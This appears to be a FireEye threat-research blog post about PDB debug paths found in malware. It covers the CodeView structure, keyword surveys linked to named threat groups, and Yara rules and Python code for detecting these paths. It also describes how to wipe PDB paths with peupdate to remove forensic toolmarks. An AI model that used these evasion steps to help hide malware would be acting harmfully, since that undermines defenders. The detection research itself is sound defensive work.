Monthly Archives: August 2019

Definitive Dossier of Devilish Debug Details – Part One: PDB Paths and Malware

Have you ever wondered what goes through the mind of a malware author? How they build their tools? How they organize their development projects? What kind of computers and software they use? We took a stab at answering some of those questions by exploring malware debug information.

We find that malware developers give descriptive names to their folders and code projects, often describing the capabilities of the malware in development. These descriptive names then show up in a PDB path when a malware project is compiled with symbol debugging information. Everyone loves an origin story, and debugging information gives us insight into the malware development environment: a small but important keyhole into where and how a piece of malware was born. We can use our newfound insight to detect malicious activity based in part on PDB paths and other debug details.

Welcome to part one of a multi-part, tweet-inspired series about PDB paths, their relation to malware, and how they may be useful in both defensive and offensive operations.

Human-Computer Conventions

Digital storage systems have revolutionized our world, but in order to make use of our stored data and retrieve it efficiently, we must organize it sensibly. Users structure directories carefully and give files and folders unique and descriptive names, often based on their content. Computers force users to label and annotate their data based on the data type, role, and purpose. This human-computer convention means that most digital content has some descriptive surface area, or descriptive “features,” that are present in many files, including malware files.

FireEye approaches detection and hunting from many angles, but on FireEye’s Advanced Practices team, we often like to flex on “weak signals.” We like to search for features of malware that are not evil in isolation but are uncommon or unique enough to be useful. We create conditional rules that, when met, act as “weak signals” telling us that a subset of data, such as a file object or a process, has some odd or novel features. These features are often incidental outcomes of adversary methods, or modus operandi, that each represent deliberate choices made by malware developers or intrusion operators. Not all of these features were meant to be there, and they were certainly not intended for defenders to notice. This is especially true for PDB paths, which can be described as an outcome of the compilation process, a toolmark left in malware that describes the development environment.


A program database (PDB) file, often referred to as a “symbol file,” is generated upon compilation to store debugging information about an individual build of a program. A PDB may store symbols, addresses, names of functions and resources and other information that may assist with debugging the program to find the exact source of an exception or error.

Malware is software, and malware developers are software developers. Like any software developers, malware authors often have to debug their code and sometimes end up creating PDBs as part of their development process. If they do not spend time debugging their malware, they risk their malware not functioning correctly on victim hosts, or not being able to successfully communicate with their malware remotely.

How PDB Paths are Made (the birds and the PDBs?)

But how are PDBs created and connected to programs? Let’s examine the formation of one PDB path through the eyes of a malware developer and blogger, the soon-to-be-infamous “smiller.”

Smiller has a lot of programming projects and organizes them in an aptly labeled folder structure on his computer. This project is for a shellcode loader embedded in an HTML Application (HTA) file, and the developer stores it quite logically in the folder:


Figure 1: The simple “Test” project code file “Program.cs” which embeds a piece of shellcode and a launcher executable within an HTML Application (HTA) file

Figure 2: The malicious Visual Studio solution HtaDotnet and corresponding “Test” project folder as seen through Windows Explorer. The names of the folders and files are suggestive of their functionalities

The malware author then compiles the “Test” project in Visual Studio using the default “Debug” configuration (Figure 3), and Visual Studio writes Test.exe and Test.pdb to a subfolder (Figure 4).

Figure 3: The Visual Studio output of a default compiling configuration

Figure 4: Test.exe and Test.pdb are written to a default subfolder of the code project folder

In the Test.pdb file (Figure 5) there are references to the original path for the source code files along with other binary information for use in debugging.

Figure 5: Test.pdb contains binary debug information and references to the original source code files for use in debugging

During compilation, the linker associates the PDB file with the built executable by adding an entry to the IMAGE_DEBUG_DIRECTORY that specifies the type of debug information. In this case, the debug type is CodeView, so the PDB path is embedded in the IMAGE_DEBUG_TYPE_CODEVIEW portion of the file. This enables a debugger to locate the correct PDB file, Test.pdb, while debugging Test.exe.

Figure 6: Test.exe as shown in the PEview utility, which easily parses out the PDB path from the IMAGE_DEBUG_TYPE_CODEVIEW section of the executable file
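To make the linker's bookkeeping concrete, here is a minimal Python sketch of walking the debug directory. It assumes you have already located the directory's raw bytes through the PE optional header (not shown) and relies only on the standard 28-byte IMAGE_DEBUG_DIRECTORY layout from winnt.h; the class and function names are hypothetical, chosen for illustration.

```python
import struct
from typing import List, NamedTuple

IMAGE_DEBUG_TYPE_CODEVIEW = 2  # constant from winnt.h
# IMAGE_DEBUG_DIRECTORY: Characteristics, TimeDateStamp, MajorVersion,
# MinorVersion, Type, SizeOfData, AddressOfRawData, PointerToRawData (28 bytes)
DEBUG_ENTRY = struct.Struct("<IIHHIIII")


class DebugEntry(NamedTuple):
    debug_type: int
    size_of_data: int
    address_of_raw_data: int  # RVA of the debug data once loaded
    pointer_to_raw_data: int  # file offset of the debug data on disk


def parse_debug_directory(blob: bytes) -> List[DebugEntry]:
    """Split the raw bytes of a debug directory into its 28-byte entries."""
    entries = []
    for off in range(0, len(blob) - DEBUG_ENTRY.size + 1, DEBUG_ENTRY.size):
        _chars, _stamp, _major, _minor, dbg_type, size, rva, raw = DEBUG_ENTRY.unpack_from(blob, off)
        entries.append(DebugEntry(dbg_type, size, rva, raw))
    return entries


def codeview_entries(blob: bytes) -> List[DebugEntry]:
    """Keep only the entries that point at CodeView (PDB path) data."""
    return [e for e in parse_debug_directory(blob) if e.debug_type == IMAGE_DEBUG_TYPE_CODEVIEW]
```

The `pointer_to_raw_data` of a CodeView entry is the file offset where the RSDS record described in the next section begins.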

PDB Path in CodeView Debug Information

CodeView Structure

The exact format of the debug information may vary depending on the compiler, the linker, and the modernity of one’s software development tools. CodeView debug information is stored under IMAGE_DEBUG_TYPE_CODEVIEW in the following structure:

"RSDS" header (4 bytes)
16-byte Globally Unique Identifier (GUID)
4-byte "age" (incrementing number of revisions)
PDB path, null terminated

Figure 7: Structure of CodeView debug directory information
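The structure in Figure 7 maps directly onto a few `struct` and `uuid` calls. The following Python sketch, built around a hypothetical `parse_rsds` helper, assumes it is handed the raw bytes that a CodeView debug entry points to; it handles only the RSDS layout and returns None for anything else, such as the older NB10 format.

```python
import struct
import uuid
from typing import NamedTuple, Optional


class CodeViewInfo(NamedTuple):
    guid: uuid.UUID
    age: int
    pdb_path: bytes  # raw bytes: paths are not guaranteed to be valid text


def parse_rsds(record: bytes) -> Optional[CodeViewInfo]:
    """Parse an RSDS record: 4-byte header, 16-byte GUID, 4-byte age, path."""
    if len(record) < 24 or record[:4] != b"RSDS":
        return None
    # The GUID's first three fields are little-endian, as in a Windows GUID struct.
    guid = uuid.UUID(bytes_le=record[4:20])
    (age,) = struct.unpack_from("<I", record, 20)
    pdb_path = record[24:].split(b"\x00", 1)[0]  # stop at the null terminator
    return CodeViewInfo(guid, age, pdb_path)
```

Keeping the path as raw bytes is a deliberate choice: as later examples in this post show, PDB paths in the wild are not always valid text in any single encoding.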

Full Versus Partial PDB Path

There are generally two buckets of CodeView PDB paths: those that are fully qualified directory paths, and those that are partially qualified and specify only the name of the PDB file. In both cases, the PDB file name with the .pdb extension is included so that the debugger can locate the correct PDB for the program.

A partially qualified PDB path would list only the PDB file name, such as:


A fully qualified PDB path usually begins with a volume drive letter and a directory path to the PDB file name such as:


Typically, native Windows executables use a partially qualified PDB path because many of the debug PDB files are publicly available on the Microsoft public symbol server, so the fully qualified path is unnecessary in the symbol path (the PDB path). For the purposes of this research, we will be mostly looking at fully qualified PDB paths.
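One rough way to sort paths into these two buckets is sketched below in Python. It is a heuristic under our own assumptions: drive-letter paths and UNC network shares (\\host\share) count as fully qualified, bare file names count as partially qualified, and everything else (relative or Unix-style paths) falls into a third bucket. The function name is hypothetical.

```python
import re

# Drive-letter paths such as "D:\C++\...\x.pdb" (also tolerates forward slashes)
_DRIVE_PATH = re.compile(r"^[A-Za-z]:[\\/]")


def classify_pdb_path(path: str) -> str:
    """Return 'full', 'partial', or 'other' for a CodeView PDB path string."""
    if _DRIVE_PATH.match(path) or path.startswith("\\\\"):
        return "full"  # drive-letter path or UNC network share
    if "\\" not in path and "/" not in path:
        return "partial"  # bare file name, e.g. "Test.pdb"
    return "other"  # relative or Unix-style paths
```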

Surveying PDB Paths in Malware

In Operation Shadowhammer, which has a myriad of connections to APT41, one sample had a simple, yet descriptive PDB path: “D:\C++\AsusShellCode\Release\AsusShellCode.pdb”.

The naming makes perfect sense. The malware was intended to masquerade as Asus Corporation software, and the role of the malware was shellcode. The malware developer named the project after the function and role of the malware itself.

If we accept that the nature of digital data forces developers into these naming conventions, we figured that these conventions would hold true across other threat actors, malware families, and intrusion operations. FireEye’s Advanced Practices team loves to take seemingly innocuous features of an intrusion set and determine what about these things is good, bad and ugly. What is normal, and what is abnormal? What is globally prevalent and what is rare? What are malware authors doing that is different from what non-malware developers are doing? What assumptions can we make and measure?

Letting our curiosity take the wheel, we adapted the CodeView debug information structure into a regular expression (Figure 8) and developed Yara rules (Figure 9) to survey our data sets. This helped us identify commonalities and enabled us to see which threat actors and malware families may be “detectable” based only on features within PDB path strings.

Figure 8: A Perl-compatible regular expression (PCRE) adaptation of the PDB7 debug information in an executable to include a specific keyword

Figure 9: Template Yara rule to search for executables with PDB files matching a keyword
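The sketch below approximates the Figure 8 idea with Python's `re` module. It is our own approximation rather than the exact expression from Figure 8, modeled on the `RSDS[\x00-\xFF]{20}[a-zA-Z]:\\ ... \.pdb\x00` shape used in the Yara rules later in this post. One deliberate difference: path bytes are restricted to non-null values so a match cannot run past a path's terminator into neighboring data. `keyword_pdb_regex` and `find_keyword_paths` are hypothetical names.

```python
import re
from typing import List


def keyword_pdb_regex(keyword: str) -> "re.Pattern[bytes]":
    """Compile a bytes regex for an RSDS record whose full path contains keyword."""
    kw = re.escape(keyword.encode("ascii"))
    return re.compile(
        rb"RSDS[\x00-\xff]{20}"          # "RSDS", 16-byte GUID, 4-byte age
        rb"[a-zA-Z]:\\[^\x00]{0,500}?"    # drive letter, then path bytes (no nulls)
        + kw
        + rb"[^\x00]{0,500}?\.pdb\x00",  # rest of the path, ".pdb", terminator
        re.IGNORECASE,
    )


def find_keyword_paths(data: bytes, keyword: str) -> List[bytes]:
    """Return the PDB path of every matching record found in data."""
    # Skip the 24-byte header/GUID/age prefix and drop the trailing null.
    return [m.group(0)[24:-1] for m in keyword_pdb_regex(keyword).finditer(data)]
```

Case-insensitive matching is used because developers are inconsistent about capitalization, as “AsusShellCode” shows.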

PDB Path Showcase: Malware Naming Conventions

We surveyed 10+ million samples in our incident response and malware corpus, and we found plenty of common PDB path keywords that seemed to transcend different sources, victims, affected regions, impacted industries, and actor motivations. To help articulate the broad reach of malware developer commonalities, we detail a handful of the stronger keywords along with example PDB paths and the malware families and threat groups for which at least one sample contains the keyword.

Please note that the example paths and represented malware families and groups are a selection from the total data set, and are not necessarily correlated, clustered or otherwise related to each other. This is intended to illustrate the wide presence of PDB paths with keywords and how malware developers, irrespective of origin, targets and motivations, often end up using some of the same words in their naming. We believe that this commonality increases the surface area of malware and introduces new opportunities for detection and hunting.

PDB Path Keyword Prevalence

Families and Groups Observed: APT10, APT24, APT41, UNC589, UNC824, UNC969, UNC765

Families and Groups Observed: APT1, UNC776, UNC251, UNC1131

Families and Groups Observed: APT41, APT34, APT37, UNC52, UNC1131, APT40

Families and Groups Observed: UNC373, UNC510, UNC875, APT36, APT33, APT5, UNC822
Example PDB Path: C:\Documents and Settings\ss\桌面\tls\scr\bind\bind\Release\bind.pdb (桌面 is Chinese for “Desktop”)

Families and Groups Observed: APT10, APT34, APT21, UNC1289, UNC1450
Example PDB Path: C:\Documents and Settings\Administrator\桌面\BypassUAC.VS2010\Release\Go.pdb

Families and Groups Observed: APT28, UNC1354, UNC1077, UNC27, UNC653, UNC1180, UNC1031
Example PDB Path: Z:\projects\vs 2012\Inst DWN and DWN XP\downloader_dll_http_mtfs\Release\downloader_dll_http_mtfs.pdb

Families and Groups Observed: UNC776, UNC1095, APT29, APT36, UNC964, UNC1437, UNC849
Example PDB Path: D:\Task\DDE Attack\Dropper_Original\Release\Dropper.pdb

Families and Groups Observed: UNC1030, APT39, APT34, FIN6

Families and Groups Observed: UNC1172, APT39, UNC822

Families and Groups Observed: APT17, UNC208, UNC276

Families and Groups Observed: UNC1152, APT40, UNC78, UNC874, UNC52, UNC502, APT33, APT8
Example PDB Path: C:\Users\Alienware.DESKTOP-MKL3QDN\Documents\Hacker\memorygrabber - ID\memorygrabber\obj\x86\Debug\vshost.pdb

Families and Groups Observed: APT26, APT40, UNC213, UNC44, UNC53, UNC282

Families and Groups Observed: UNC842, UNC1197, UNC1040, UNC969
Example PDB Path: D:\รายงาน\C++ & D3D & Hook & VB.NET & PROJECT\Visual Studio 2010\CodeMaster OnlyTh\Inject_Win32_2\Inject Win32\Inject Win32\Release\OLT_PBFREE.pdb (รายงาน is Thai for “report”)

Families and Groups Observed: UNC606, APT10, APT34, APT41, UNC373, APT31, APT19, APT1, UNC82, UNC1168, UNC1149, UNC575
Example PDB Path: E:\0xFFDebug\My Source\HashDump\Release\injectLsa.pdb

Families and Groups Observed: UNC869, UNC385, UNC228, APT5, UNC229, APT26, APT37, UNC432, APT18, UNC27, APT6, UNC1172, UNC593, UNC451, UNC875, UNC53

Families and Groups Observed: APT37, UNC82, UNC1095, APT1, APT40
Example PDB Path: D:\TASK\ProgamsByMe(2015.1~)\MyWork\Relative Backdoor\KeyLogger_ScreenCap_Manager\Release\SoundRec.pdb

Families and Groups Observed: UNC915, UNC632, UNC1149, APT28, UNC878
Example PDB Path: C:\Users\WIN-2-ViHKwdGJ574H\Desktop\NSA\Payloads\windows service cpp\Release\CppWindowsService.pdb

Families and Groups Observed: UNC48, UNC1225, APT17, UNC1149, APT35, UNC251, UNC521, UNC8, UNC849, UNC1428, UNC1374, UNC53, UNC1215, UNC964, UNC1217, APT3, UNC671, UNC757, UNC753, APT10, APT34, UNC229, APT18, APT9, UNC124, UNC1559

Families and Groups Observed: FIN7, UNC583, UNC822, UNC1120

Families and Groups Observed: UNC1373, UNC366, APT19, UNC1352, UNC27, APT1, UNC981, UNC581, UNC1559


Figure 10: A selection of common keywords in PDB paths with groups and malware families observed and examples

PDB Path Showcase: Suspicious Developer Environment Terms

The keywords that are typically used to describe malware are strong enough to raise red flags, but there are other common terms or features in PDB paths that may signal that an executable was compiled in a non-enterprise setting. For example, a PDB path containing a “Users” directory tells you that the executable was likely compiled on Windows Vista/7/10 and likely does not represent an “official” or “commercial” development environment. The term “Users” is much weaker, or lower in fidelity, than “shellcode,” but as we demonstrate below, these terms are indeed present in lots of malware and can be used for weak detection signals.

PDB Path Term Prevalence

Families and Groups Observed: APT5, APT10, APT17, APT33, APT34, APT35, APT36, APT37, APT39, APT40, APT41, FIN6, UNC284, UNC347, UNC373, UNC432, UNC632, UNC718, UNC757, UNC791, UNC824, UNC875, UNC1065, UNC1124, UNC1149, UNC1152, UNC1197, UNC1289, UNC1295, UNC1340, UNC1352, UNC1354, UNC1374, UNC1406, UNC1450, UNC1486, UNC1507, UNC1516, UNC1534, UNC1545, UNC1562
Example PDB Path: C:\Users\Yousef\Desktop\MergeFiles\Loader v0\Loader\obj\Release\Loader.pdb

Term: (Visual Studio default project names)
Families and Groups Observed: APT1, APT34, APT36, FIN6, UNC251, UNC729, UNC1078, UNC1147, UNC1172, UNC1267, UNC1277, UNC1289, UNC1295, UNC1340, UNC1470, UNC1507

Term: New Folder
Families and Groups Observed: APT18, APT33, APT36, UNC53, UNC74, UNC672, UNC718, UNC1030, UNC1289, UNC1340, UNC1559
Example PDB Path: c:\Users\USA\Documents\Visual Studio 2008\Projects\New folder (2)\kasper\Release\kasper.pdb

Families and Groups Observed: UNC124, UNC718, UNC757, UNC1065, UNC1215, UNC1225, UNC1289
Example PDB Path: D:\dll_Mc2.1mc\2.4\2.4.2 xor\zhu\dll_Mc - Copy\Release\shellcode.pdb

Families and Groups Observed: APT5, APT17, APT26, APT33, APT34, APT35, APT36, APT41, UNC53, UNC276, UNC308, UNC373, UNC534, UNC551, UNC572, UNC672, UNC718, UNC757, UNC791, UNC824, UNC875, UNC1124, UNC1149, UNC1197, UNC1352

Figure 11: A selection of common terms in PDB paths with groups and malware families observed and examples
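Terms like these lend themselves to simple, tunable lookups. The Python sketch below uses a hypothetical `WEAK_TERMS` table whose entries come from the example paths above (a “Users” directory, “Desktop”, Explorer's default “New folder” name, and the “ - Copy” suffix Explorer adds to duplicated folders). The descriptions are our own annotations, and a real deployment would need its own term list and thresholds.

```python
from typing import Dict, List

# Hypothetical weak-signal terms taken from the example paths above.
WEAK_TERMS: Dict[str, str] = {
    "\\users\\": "compiled under a per-user profile (Vista/7/10)",
    "\\desktop\\": "project kept on the desktop",
    "new folder": "default Explorer folder name",
    " - copy": "Explorer copy of a project folder",
}


def weak_signals(pdb_path: str) -> List[str]:
    """Return the description of every weak-signal term found in a PDB path."""
    lowered = pdb_path.lower()  # match terms case-insensitively
    return [why for term, why in WEAK_TERMS.items() if term in lowered]
```

Each hit is meant to be a low-fidelity signal; counting hits per file is one simple way to rank a haystack for review.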

PDB Path Showcase: Exploring Anomalies

Outside of keywords and terms, we discovered a few features that were uncommon (to us) and that may be interesting for future research and detection opportunities.

Non-ASCII Characters

PDB paths with any non-ASCII characters have a high ratio of malware to non-malware in our datasets. The strength of this signal is due only to a data bias in our malware corpus and our client base. However, if this data bias is consistent, we can use the presence of non-ASCII characters in a PDB path as a signal that an executable merits further scrutiny. In organizations that operate primarily in the world of ASCII, we imagine this will be a strong signal. Below we express logic for this technique in Yara:

rule ConventionEngine_Anomaly_NonAscii {
    meta:
        author = "@stvemillertime"
    strings:
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,500}[^\x00-\x7F]{1,}[\x00-\xFF]{0,500}\.pdb\x00/
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre
}
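For analysts working outside Yara, the same logic can be approximated in Python as sketched below. This is not a line-for-line port: `is_pe` mirrors the rule's MZ/PE header check, and the pattern looks for the first non-ASCII byte after the drive letter while, unlike the Yara PCRE, keeping path bytes non-null so a match stays inside one CodeView record. Both function names are hypothetical.

```python
import re
import struct

# Drive letter, ASCII path bytes, then at least one byte >= 0x80 before ".pdb\0".
NON_ASCII_PDB = re.compile(
    rb"RSDS[\x00-\xff]{20}[a-zA-Z]:\\[\x01-\x7f]{0,500}[\x80-\xff][^\x00]{0,500}\.pdb\x00"
)


def is_pe(data: bytes) -> bool:
    """Mirror the rule's header check: MZ at offset 0, PE signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def non_ascii_pdb_anomaly(data: bytes) -> bool:
    """True for a PE file that contains a PDB path with non-ASCII bytes."""
    return is_pe(data) and NON_ASCII_PDB.search(data) is not None
```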

Multiple Paths in a Single File

Each compiled program should only have one PDB path. The presence of multiple PDB paths in a single object indicates that the object has subfile executables, from which you may infer that the parent object has the capability to “drop” or “install” other files. While being a dropper or installer is not malicious on its own, having an alternative method of applying those classifications to file objects may be of assistance in surfacing malicious activity. In this example, we can also search for this capability using Yara:

rule ConventionEngine_Anomaly_MultiPDB_Triple {
    meta:
        author = "@stvemillertime"
    strings:
        $anchor = "RSDS"
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #anchor == 3 and #pcre == 3
}
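The Yara rule above fires on exactly three paths; the Python sketch below generalizes that idea to any file with at least `threshold` embedded, fully qualified PDB paths. The default threshold of two and the hypothetical `looks_like_dropper` name are our assumptions, and as the text notes, a hit suggests dropper or installer capability rather than proving malice.

```python
import re
from typing import List

# Same shape as the Yara PCRE, but path bytes exclude nulls so each match
# stays inside a single CodeView record.
CODEVIEW_PATH = re.compile(rb"RSDS[\x00-\xff]{20}([a-zA-Z]:\\[^\x00]{0,200}?\.pdb)\x00")


def embedded_pdb_paths(data: bytes) -> List[bytes]:
    """Return every fully qualified PDB path found anywhere in the file bytes."""
    return [m.group(1) for m in CODEVIEW_PATH.finditer(data)]


def looks_like_dropper(data: bytes, threshold: int = 2) -> bool:
    """Weak signal: several PDB paths in one file suggest embedded executables."""
    return len(embedded_pdb_paths(data)) >= threshold
```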

Outside of a Debug Section

When a file is compiled, the entry for the debug information is placed in the IMAGE_DEBUG_DIRECTORY. Similar to seeing multiple PDB paths in a single file, when we see debug information inside an executable that does not have a debug directory, we can infer that the file has subfile executables and likely has dropper or installer functionality. In this rule, we use Yara’s convenient PE module to check the relative virtual address (RVA) of the IMAGE_DIRECTORY_ENTRY_DEBUG entry; if it is zero, we can presume that there is no debug entry, and thus the presence of a CodeView PDB path indicates that there is a subfile.

import "pe"
rule ConventionEngine_Anomaly_OutsideOfDebug {
    meta:
        author = "@stvemillertime"
        description = "Searching for PE files with PDB path keywords, terms or anomalies."
    strings:
        $anchor = "RSDS"
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $anchor and $pcre and pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_DEBUG].virtual_address == 0
}
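Yara's PE module does the header parsing for you. As a sketch of what `pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_DEBUG].virtual_address` reads under the hood, the Python below walks the DOS and PE headers by hand, assuming a PE32 or PE32+ file; the helper names are hypothetical, and truncated or unrecognized headers simply return None.

```python
import re
import struct
from typing import Optional

IMAGE_DIRECTORY_ENTRY_DEBUG = 6  # index into the optional header's data directories
CODEVIEW_PATH = re.compile(rb"RSDS[\x00-\xff]{20}[a-zA-Z]:\\[^\x00]{0,200}?\.pdb\x00")


def debug_directory_rva(data: bytes) -> Optional[int]:
    """RVA of the debug data directory, 0 if absent, None if not a parsable PE."""
    try:
        if data[:2] != b"MZ":
            return None
        (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
        if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
            return None
        opt = e_lfanew + 4 + 20  # skip the signature and the 20-byte IMAGE_FILE_HEADER
        (magic,) = struct.unpack_from("<H", data, opt)
        if magic not in (0x10B, 0x20B):  # PE32 or PE32+
            return None
        dirs = opt + (96 if magic == 0x10B else 112)  # start of DataDirectory[]
        (count,) = struct.unpack_from("<I", data, dirs - 4)  # NumberOfRvaAndSizes
        if count <= IMAGE_DIRECTORY_ENTRY_DEBUG:
            return 0
        rva, _size = struct.unpack_from("<II", data, dirs + 8 * IMAGE_DIRECTORY_ENTRY_DEBUG)
        return rva
    except struct.error:  # headers run past the end of the buffer
        return None


def codeview_outside_debug(data: bytes) -> bool:
    """Mirror of the Yara rule: a CodeView path present but no debug directory."""
    return debug_directory_rva(data) == 0 and CODEVIEW_PATH.search(data) is not None
```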

Nulled Out PDB Paths

In the typical CodeView section, we would see the “RSDS” header, the 16-byte GUID, a 4-byte “age” and then a PDB path string. However, we’ve identified a significant number of malware samples where the embedded PDB path area is nulled out. In this example, we can easily see the CodeView debug structure, complete with header, GUID and age, followed by nulls to the end of the segment.

00147880: 52 53 44 53 18 c8 03 4e 8c 0c 4f 46 be b2 ed 9e : RSDS...N..OF....
00147890: c1 9f a3 f4 01 00 00 00 00 00 00 00 00 00 00 00 : ................
001478a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................
001478b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................
001478c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................
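A check for this pattern only needs the fixed-size prefix of the record. The Python sketch below, with a hypothetical `is_nulled_pdb_path` helper, treats a record as nulled out when at least `min_nulls` zero bytes (an arbitrary default of 16, our assumption) follow the header, GUID, and age, which is what the dump above shows.

```python
from typing import Optional


def is_nulled_pdb_path(record: bytes, min_nulls: int = 16) -> Optional[bool]:
    """True if an RSDS record keeps its header, GUID and age but the path
    area starts with at least min_nulls zero bytes; None if not RSDS."""
    if len(record) < 24 + min_nulls or record[:4] != b"RSDS":
        return None
    return record[24:24 + min_nulls] == bytes(min_nulls)
```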

There are a few possibilities of how and why a CodeView PDB path may be nulled out, but in the case of intentional tampering, for the purposes of removing toolmarks, the easiest way would be to manually overwrite the PDB path with \x00s. The risk of manual editing and overwriting via hex editor is that doing so is laborious and may introduce other static anomalies such as checksum errors.

The next easiest way is to use a utility designed to wipe out debug artifacts from executables. One stellar example of this is “peupdate,” which is designed not only to strip or fabricate the PDB path information but also to recalculate the checksum and eliminate Rich headers. Below we demonstrate the use of peupdate to clear the PDB path.

Figure 12: Using peupdate to clear the PDB path information from a sample of malware

Figure 13: The peupdate tampered malware as shown in the PEview utility. We see the CodeView section is still present but the PDB path value has been cleared out

PDB Path Anomaly Prevalence

Anomaly: Non-ASCII Characters
Families and Groups Observed: APT1, APT2, APT3, APT5, APT6, APT9, APT10, APT14, APT17, APT18, APT20, APT21, APT23, APT24, APT26, APT31, APT33, APT41, UNC20, UNC27, UNC39, UNC53, UNC74, UNC78, UNC1040, UNC1078, UNC1172, UNC1486, UNC156, UNC208, UNC229, UNC237, UNC276, UNC293, UNC366, UNC373, UNC451, UNC454, UNC521, UNC542, UNC551, UNC556, UNC565, UNC584, UNC629, UNC753, UNC794, UNC798, UNC969

Anomaly: Multi Path in Single File
Families and Groups Observed: APT1, APT2, APT17, APT5, APT20, APT21, APT26, APT34, APT36, APT37, APT40, APT41, UNC27, UNC53, UNC218, UNC251, UNC432, UNC521, UNC718, UNC776, UNC875, UNC878, UNC969, UNC1031, UNC1040, UNC1065, UNC1092, UNC1095, UNC1166, UNC1183, UNC1289, UNC1374, UNC1443, UNC1450, UNC1495
Single Sample of TRICKBOT:

Anomaly: Outside of Debug Section
Families and Groups Observed: APT5, APT6, APT9, APT10, APT17, APT22, APT24, APT26, APT27, APT29, APT30, APT34, APT35, APT36, APT37, APT40, APT41, UNC20, UNC27, UNC39, UNC53, UNC69, UNC74, UNC105, UNC124, UNC125, UNC147, UNC213, UNC215, UNC218, UNC227, UNC251, UNC276, UNC282, UNC307, UNC308, UNC347, UNC407, UNC565, UNC583, UNC587, UNC589, UNC631, UNC707, UNC718, UNC775, UNC776, UNC779, UNC842, UNC869, UNC875, UNC924, UNC1040, UNC1080, UNC1148, UNC1152, UNC1225, UNC1251, UNC1428, UNC1450, UNC1486, UNC1575

Anomaly: Nulled Out PDB Paths
Families and Groups Observed: APT41, UNC776, UNC229, UNC177, UNC1267, UNC878, UNC1511


Figure 14: A selection of anomalies in PDB paths with groups and malware families observed and examples

PDB Path Showcase: Outliers, Oddities, Exceptions and Other Shenanigans

The internet is a weird place, and at a big enough scale, you end up seeing things that you never thought you would: things that deviate from the norms, things that shirk the standards, things that utterly defy explanation. We expect PDB paths to look a certain way, but we’ve run across several samples that did not, and we’re not always sure why. Many of the samples below may be the result of errors, corruption, obfuscation, or various forms of intentional manipulation. We’re demonstrating them here to show that if you are attempting PDB path parsing or detection, you need to understand the variety of paths in the wild and prepare for shenanigans galore. Each of these examples is from a confirmed malware sample.


Example PDB Paths

Unicode error

Text Path: C^\Users\DELL\Desktop\interne.2.pdb

Raw Path: 435E5C55 73657273 5C44454C 4C5C4465 736B746F 705C696E 7465726E 6598322E 706462


Text Path: Cj\Users\hacker messan\Deskto \Server111.pdb

Raw Path: 436A5C55 73657273 5C686163 6B657220 6D657373 616E5C44 65736B74 6FA05C53 65727665 72313131 2E706462

Nothing but space

Text Path:                                                         

Full Raw: 52534453 7A7F54BF BAC9DE45 89DC995F F09D2327 0A000000 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202000

Spaced out

Text Path: D:\                                 .pdb

Full Raw: 52534453 A7FBBBFE 5C41A545 896EF92F 71CD1F08 01000000 443A5C20 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 2E706462 00

Nothin’ but null

Text Path: <null bytes only>

Full Raw: 52534453 97272434 3BACFA42 B2DAEE99 FAB00902 01000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000

Random characters

Text Path: Lmd9knkjasdLmd9knkjasLmd9knkAaGc.pdb

Random path

Text Path: G:\givgLxNzKzUt\TcyaxiavDCiu\bGGiYrco\QNfWgtSs\auaXaWyjgmPqd.pdb

Word soup

Text Path: c:\Busy\molecule\Blue\Valley\Steel\King\enemy\Himyard.pdb

Mixed doubles



Text Path: 1.pdb

No .pdb

Text Path: a

Full Raw: 52534453 ED86CA3D 6C677946 822E668F F48B0F9D 01000000 6100

Long and weird with repeated character

Text Path: ªªªªªªªªªªªªªªªªªªªªtinjs\aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaae.pdb

Full Raw: 52534453 DD947C2F 6B32544C 8C3ACB2E C7C39F45 01000000 AAAAAAAA AAAAAAAA AAAAAAAA AAAAAAAA AAAAAAAA 74696E6A 735C6161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 652E7064 6200

No idea

Text Path: n:.Lí..×ÖòÒ.

Full Raw: 52534453 5A2D831D CB4DCF1E 4A05F51B 94992AA0 B7CFEE32 6E3AAD4C ED1A1DD7 D6F2D29E 00

Forward slashes and no drive letter

Text Path: /Users/user/Documents/GitHub/SharpWMI/SharpWMI/obj/Debug/SharpWMI.pdb

Network share

Text Path: \\vmware-host\shared folders\Decrypter\Decrypter\obj\Release\Decrypter.pdb

Non-Latin drive letter

We haven’t seen this yet, but it’s only a matter of time until you can have an emoji as a drive letter.

Figure 15: A selection of PDB paths shenanigans with examples
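If you parse PDB paths at scale, it helps to record these oddities instead of discarding them. The Python sketch below is one hypothetical way to tag a raw path with the kinds of deviations shown in Figure 15; the category names and checks are our own and are not exhaustive.

```python
import re
from typing import List

_DRIVE = re.compile(rb"^[A-Za-z]:\\")


def path_oddities(path: bytes) -> List[str]:
    """List ways a raw CodeView path deviates from a typical Windows PDB path."""
    if not path:
        return ["empty"]
    issues = []
    if not path.strip(b" "):
        issues.append("only spaces")
    if not path.lower().endswith(b".pdb"):
        issues.append("no .pdb extension")
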